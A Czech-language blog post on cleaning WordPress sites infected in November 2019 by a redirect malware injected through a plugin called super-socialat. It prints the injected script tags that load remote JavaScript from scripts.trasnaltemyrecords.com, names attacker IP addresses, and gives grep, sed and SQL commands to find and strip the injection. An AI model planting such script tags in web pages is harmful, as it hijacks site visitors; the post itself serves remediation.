Malware “scripts.trasnaltemyrecords.com” a jeho vyčištění

Malware “scripts.trasnaltemyrecords.com” a jeho vyčištění

Co se přihodilo?

Dne 6.11.2019 v ranních hodinách se na několika webech objevil malware, který přesměrovává web na reklamní stránky.

V logovacím skriptu jsem objevil, že se pomocí existujícího uživatele někdo připojil z IP adres 185.212.128.231 a 185.212.128.232. Následně nahrál plugin: super-socialat, ten rozbalil a pomocí jeho skriptů se všude roznesly škodlivé kódy.

Sledovací kód se nahrál do všech souborů index.php a to do všech složek.

<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>

Dále se nahrály další typy souborů, ovlivněn je také wp-config soubor, hlavní index.php v rootu WP a také všechny javascriptové soubory v adresářích wp-includes a wp-admin.

Možné příčiny průniku

Vladimír Smitka ze společnosti Lynt.cz analyzoval stovky napadených webů a vše podle něj ukazuje na 3 možné příčiny.

Přečte si více v komentáři zde pod článkem.

Postup pro odstranění malwaru:

Doporučuji zaprvé jít na stránku /wp-admin/update-core.php a přeinstalovat aktuální verzi WordPress. Tím se zbavíte všech infikovaných souborů ve složkách wp-includes a wp-admin.

Připojte se na server přes terminál (SSH), můžete se podívat, které soubory mají v sobě infikovaný kód:

grep -rlw --include="index.php" -e "trasnaltemyrecords" /www/(cesta k vaší WP instalaci)

Dále pak můžete použít tento skript pro smazání výše zmíněného sledovacího kódu ze všech souborů.

grep -rl "<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g"

Dále musíte promazat soubory, které tam nemají co dělat. Je to cca 2-5 php souborů a poznáte je na první pohled. Jsou to názvy jako “wn-SlrBYutdKq.php”, “c8iocdreai.php”, “68i7kau19g.php”, ale tyto názvy budou asi u každého jinak.
Podívejte se do:

  • hlavní složka instalace
  • složky /wp-content/uploads/

Tento malware se nahrál i do databáze, do tabulek jako wp_posts a několik dalších. Takže i do obsahu Vašeho webu. SQL příkaz na vymazání nebezpečného kódu nemám, neb jsem měl všude zálohu databáze a mohl jsem ji bez potíží využít.

Měl by však pomoci tento SQL příkaz:

UPDATE wp_posts SET post_content = REPLACE(post_content, “<script src=\’https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043\’ type=\’text/javascript\’></script>”, “”) WHERE post_content LIKE “%<script src=\’https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043\’ type=\’text/javascript\’></script>%”

Je doporučeno ihned změnit heslo do databáze, toto heslo bylo kompromitováno.

Nakonec si tedy ještě zkontrolujte, že tam opravdu plugin super-socialat už není.

Budeme rádi za Váš názor

Vaše emailová adresa nebude zveřejněna